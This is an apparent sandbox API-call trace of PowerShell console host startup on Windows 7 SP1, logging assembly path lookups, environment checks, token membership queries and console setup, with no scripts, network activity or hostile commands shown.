	[0426.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0426.377] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0426.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.377] CoTaskMemFree (pv=0x49d5b0) 
	[0426.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0426.992] SetErrorMode (uMode=0x1) returned 0x1
	[0426.992] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24d8a0 | out: lpFileInformation=0x24d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0426.993] SetErrorMode (uMode=0x1) returned 0x1
	[0427.574] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0427.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.574] CoTaskMemFree (pv=0x49d5b0) 
	[0427.576] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0427.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.576] CoTaskMemFree (pv=0x49d5b0) 
	[0427.576] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0427.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.576] CoTaskMemFree (pv=0x49d5b0) 
	[0427.578] CoCreateGuid (in: pguid=0x24dc68 | out: pguid=0x24dc68*(Data1=0x3d058272, Data2=0x652b, Data3=0x4df1, Data4=([0]=0x86, [1]=0x1c, [2]=0x5, [3]=0x4a, [4]=0x15, [5]=0xc, [6]=0x15, [7]=0x5f))) returned 0x0
	[0427.581] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0427.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.582] CoTaskMemFree (pv=0x49d5b0) 
	[0427.866] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0427.866] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.866] CoTaskMemFree (pv=0x49d5b0) 
	[0427.869] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0427.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0427.869] CoTaskMemFree (pv=0x49d5b0) 
	[0427.876] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0427.877] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24d910 | out: lpConsoleScreenBufferInfo=0x24d910) returned 1
	[0427.883] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0427.891] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24d910 | out: lpConsoleScreenBufferInfo=0x24d910) returned 1
	[0427.892] GetVersionExW (in: lpVersionInformation=0x24d8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0427.895] GetCurrentProcess () returned 0xffffffffffffffff
	[0427.928] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24d938 | out: TokenHandle=0x24d938*=0x30c) returned 1
	[0427.932] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24d858 | out: TokenInformation=0x0, ReturnLength=0x24d858) returned 0
	[0427.933] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e7280
	[0427.933] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x3e7280, TokenInformationLength=0x4, ReturnLength=0x24d858 | out: TokenInformation=0x3e7280, ReturnLength=0x24d858) returned 1
	[0427.934] DuplicateTokenEx (in: hExistingToken=0x30c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24d9b8 | out: phNewToken=0x24d9b8*=0x308) returned 1
	[0427.934] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24d858 | out: TokenInformation=0x0, ReturnLength=0x24d858) returned 0
	[0427.935] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e72b0
	[0427.935] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x3e72b0, TokenInformationLength=0x4, ReturnLength=0x24d858 | out: TokenInformation=0x3e72b0, ReturnLength=0x24d858) returned 1
	[0427.936] CheckTokenMembership (in: TokenHandle=0x308, SidToCheck=0x2dcab48*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24d9c8 | out: IsMember=0x24d9c8) returned 1
	[0427.936] CloseHandle (hObject=0x308) returned 1
	[0427.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0427.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0427.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0427.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.218] CoTaskMemAlloc (cb=0x804) returned 0x1b82b2f0
	[0428.218] GetConsoleTitleW (in: lpConsoleTitle=0x1b82b2f0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0428.218] CoTaskMemFree (pv=0x1b82b2f0) 
	[0428.435] CoTaskMemAlloc (cb=0x804) returned 0x1b820080
	[0428.435] GetConsoleTitleW (in: lpConsoleTitle=0x1b820080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0428.435] CoTaskMemFree (pv=0x1b820080) 
	[0428.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.437] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0428.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0429.185] SetConsoleCtrlHandler (HandlerRoutine=0x1f868dc, Add=1) returned 1
	[0429.201] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0429.202] CoCreateGuid (in: pguid=0x24dab0 | out: pguid=0x24dab0*(Data1=0x8e8c7552, Data2=0xb6ab, Data3=0x49d1, Data4=([0]=0x92, [1]=0xce, [2]=0x81, [3]=0x56, [4]=0x78, [5]=0x55, [6]=0xbc, [7]=0x9a))) returned 0x0
	[0429.203] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.203] CoTaskMemFree (pv=0x49d5b0) 
	[0429.206] WinSqmIsOptedIn () returned 0x0
	[0429.334] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.334] CoTaskMemFree (pv=0x49d5b0) 
	[0429.336] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.336] CoTaskMemFree (pv=0x49d5b0) 
	[0429.336] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.337] CoTaskMemFree (pv=0x49d5b0) 
	[0429.337] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.337] CoTaskMemFree (pv=0x49d5b0) 
	[0429.337] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.338] CoTaskMemFree (pv=0x49d5b0) 
	[0429.339] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.339] CoTaskMemFree (pv=0x49d5b0) 
	[0429.339] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.339] CoTaskMemFree (pv=0x49d5b0) 
	[0429.339] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.340] CoTaskMemFree (pv=0x49d5b0) 
	[0429.343] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.343] CoTaskMemFree (pv=0x49d5b0) 
	[0429.349] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.349] CoTaskMemFree (pv=0x49d5b0) 
	[0429.350] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.350] CoTaskMemFree (pv=0x49d5b0) 
	[0429.350] CoTaskMemAlloc (cb=0x104) returned 0x49d5b0
	[0429.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d5b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.350] CoTaskMemFree (pv=0x49d5b0) 
	[0429.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
